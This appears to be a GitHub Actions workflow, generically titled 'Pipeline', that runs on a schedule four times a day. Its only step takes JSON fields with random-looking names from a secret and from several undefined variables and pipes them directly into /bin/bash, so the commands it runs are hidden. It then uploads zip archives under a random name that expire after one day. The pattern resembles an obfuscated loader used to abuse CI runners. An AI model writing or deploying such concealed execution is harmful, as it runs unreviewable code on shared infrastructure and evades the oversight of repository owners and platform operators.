name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '27 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
jobs:
  execute:
    name: Main task
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Run
        env:
          jy56: ${{ secrets.jy56 }}
        run: |
          printf '%s' "$jy56" | jq -r .ihuy61 | /bin/bash
          printf '%s' "$d65136" | jq -r .lttc77 | /bin/bash
          echo $vfc5 | jq -r .gt7972 | /bin/bash
          echo $l7531 | jq -r .xymh69 | /bin/bash
          echo $znma9452 | jq -r .hbfyp5 | /bin/bash
          printf '%s' "$x21663" | jq -r .p8 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: sZUzQzoO
          path: "*.zip"
          retention-days: 1
